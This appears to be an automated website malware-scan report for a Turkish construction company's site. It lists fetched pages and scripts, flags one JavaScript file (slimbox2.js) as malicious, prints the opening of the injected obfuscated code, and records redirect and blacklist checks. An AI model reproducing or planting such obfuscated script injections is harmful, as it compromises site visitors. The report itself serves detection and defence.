Scanned pages/files
Request | Server response | Status |
http://reisinsaat.com.tr/ | HTTP/1.1 200 OK Date: Thu, 04 Sep 2014 22:58:26 GMT Accept-Ranges: bytes ETag: "6e4bc564588ce1:121a6" Server: Microsoft-IIS/6.0 Content-Length: 22734 Content-Location: http://reisinsaat.com.tr/Index.html Content-Type: text/html Last-Modified: Wed, 24 Jul 2013 08:11:02 GMT X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin | clean |
http://reisinsaat.com.tr/index.html | 200 OK Content-Length: 22734 Content-Type: text/html | clean |
http://reisinsaat.com.tr/jscookmenu.min.js | 200 OK Content-Length: 19311 Content-Type: application/x-javascript | clean |
http://reisinsaat.com.tr/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://reisinsaat.com.tr/images/sly1.jpg | 200 OK Content-Length: 280242 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://reisinsaat.com.tr/images/sly2.jpg | 200 OK Content-Length: 282957 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./Ic-Dekorasyon.html | 200 OK Content-Length: 17998 Content-Type: text/html | clean |
http://reisinsaat.com.tr/./jscookmenu.min.js | 200 OK Content-Length: 19311 Content-Type: application/x-javascript | clean |
http://reisinsaat.com.tr/./jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/x-javascript | clean |
http://reisinsaat.com.tr/./slimbox/js/slimbox2.js | 200 OK Content-Length: 8603 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=1 Antivirus reports:
| ||
http://reisinsaat.com.tr/./images/dekore1.jpg | 200 OK Content-Length: 122337 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./images/dekore4.jpg | 200 OK Content-Length: 169994 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./images/dekore5.jpg | 200 OK Content-Length: 217497 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./images/dekore7.jpg | 200 OK Content-Length: 152974 Content-Type: image/jpeg | clean |
http://reisinsaat.com.tr/./images/dekore8.jpg | 200 OK Content-Length: 300419 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: reisinsaat.com.tr
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 22:58:26 GMT
Accept-Ranges: bytes
ETag: "6e4bc564588ce1:121a6"
Server: Microsoft-IIS/6.0
Content-Length: 22734
Content-Location: http://reisinsaat.com.tr/Index.html
Content-Type: text/html
Last-Modified: Wed, 24 Jul 2013 08:11:02 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...22734 bytes of data.
GET / HTTP/1.1
Host: reisinsaat.com.tr
Result:
HTTP/1.1 200 OK
Date: Thu, 04 Sep 2014 22:58:26 GMT
Accept-Ranges: bytes
ETag: "6e4bc564588ce1:121a6"
Server: Microsoft-IIS/6.0
Content-Length: 22734
Content-Location: http://reisinsaat.com.tr/Index.html
Content-Type: text/html
Last-Modified: Wed, 24 Jul 2013 08:11:02 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...22734 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: reisinsaat.com.tr
Referer: http://www.google.com/search?q=reisinsaat.com.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: reisinsaat.com.tr
Referer: http://www.google.com/search?q=reisinsaat.com.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=reisinsaat.com.tr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://reisinsaat.com.tr/
Result: reisinsaat.com.tr is not infected or malware details are not published yet.
Result: reisinsaat.com.tr is not infected or malware details are not published yet.